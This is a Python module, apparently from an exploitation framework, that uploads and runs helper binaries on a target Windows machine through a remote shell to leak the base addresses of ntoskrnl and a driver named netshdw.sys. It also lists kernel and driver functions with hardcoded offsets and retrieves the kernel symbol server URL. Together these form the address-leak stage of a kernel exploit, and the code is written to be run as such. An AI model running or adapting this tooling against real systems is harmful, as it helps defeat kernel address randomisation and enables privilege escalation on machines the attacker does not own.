from action.utils.control_server import upload_on_controlled

from core.core30_context.context_dependency_graph import context_dependencies, context_producer
from core.core02_model.typed.file import FilePhysical, PhysicalDirectory
from core.core30_context.context import Context

from action.utils.local_state import Store

from utils.upload import ensure_file, upload_data
from utils.manage import Shell

from pathlib import Path


def find_base_for(content, pattern):
    for idx, l in enumerate(content.split('\n')):
        if pattern in l:
            for l2 in content.split('\n')[idx + 1:]:
                if 'ImageBase' in l2:
                    return hex(int(l2.split('ImageBase: ')[-1], 16))


def interesting_functions(base_address_ntoskrnl, base_address_netshdw):
    functions = {
        'ntoskrnl': [
            ('NdisAllocateMemoryWithTag',),
            ('IoAllocateWorkItem',),
            ('IoQueueWorkItem',),
            ('NdisGetDataBuffer',),
            ('BCryptImportKeyPair',),
            ('NdisAllocateNetBufferAndNetBufferList',),
            ('NdisRegisterProtocolDriver',)
        ],
        'netshdw': [
            ('fonctionBizarre', 0x140004980),
            ('ShdwPtSyncPacketHandler', 0x140003410),
            ('ShdwCtrlDelRemotePort', 0x1400028F0),
            ('ShdwCtrlAddRemotePort', 0x140002700),
            ('checkPubkeyReceived', 0x140004450),
            ('debug', 0x1400015B0),
        ]
    }
    return functions


@context_producer(('.systemctxt.ntoskrnl_base', int), ('.systemctxt.netshdw_base', int),
                  ('.systemctxt.interesting_function_addresses', int))
@context_dependencies(('.systemctxt.execute_shell', Shell), ('.state.store', Store))
def leak_modules(ctxt: Context):
    current_store = ctxt['state']['store']
    if 'raw_leak' not in current_store:
        if not ensure_file('LeakModulesTiny.exe'):
            upload_data(FilePhysical(filename='LeakModulesTiny.exe',
                                     parent=PhysicalDirectory(dirname='tmpfs/uploads/binaries')),
                        'LeakModulesTiny.exe')
        command = ".\\LeakModulesTiny.exe"
        out = ctxt['systemctxt']['execute_shell'].execute(command, 1000)  # very very long locally, TODO: change bin
        current_store['raw_leak'] = out.decode()
        leak = out.decode()
    else:
        leak = current_store['raw_leak'].decode()

    if 'ntoskrnl_base' not in current_store:
        current_store['ntoskrnl_base'] = find_base_for(leak, 'ntoskrnl.exe')
    if 'netshdw_base' not in current_store:
        current_store['netshdw_base'] = find_base_for(leak, 'netshdw.sys')

    ctxt['systemctxt']['ntoskrnl_base'] = int(current_store['ntoskrnl_base'], 16)
    ctxt['systemctxt']['netshdw_base'] = int(current_store['netshdw_base'], 16)
    ctxt['systemctxt']['interesting_function_addresses'] = interesting_functions(ctxt['systemctxt']['ntoskrnl_base'],
                                                                                 ctxt['systemctxt']['netshdw_base'])
    return current_store['raw_leak']


@context_producer(('.systemctxt.ntoskrnl_pdb_url', Path))
@context_dependencies(('.systemctxt.execute_shell', Shell), ('.state.store', Store))
def get_symbols(ctxt: Context):
    current_store = ctxt['state']['store']
    if 'pdb_url' not in current_store:
        if not ensure_file('getPDBUrl.exe'):
            upload_data(FilePhysical(filename='getPDBUrl.exe',
                                     parent=PhysicalDirectory(dirname='tmpfs/uploads/binaries')),
                        'getPDBUrl.exe')
        command = ".\\getPDBUrl.exe"
        out = ctxt['systemctxt']['execute_shell'].execute(command, 300)
        current_store['pdb_url_leak'] = out.split(b'Symbol-Server/10.0.0.0" "')[-1].split(b'"')[0].decode()
    ctxt['systemctxt']['ntoskrnl_pdb_url'] = current_store['pdb_url_leak']
    return current_store['pdb_url_leak']
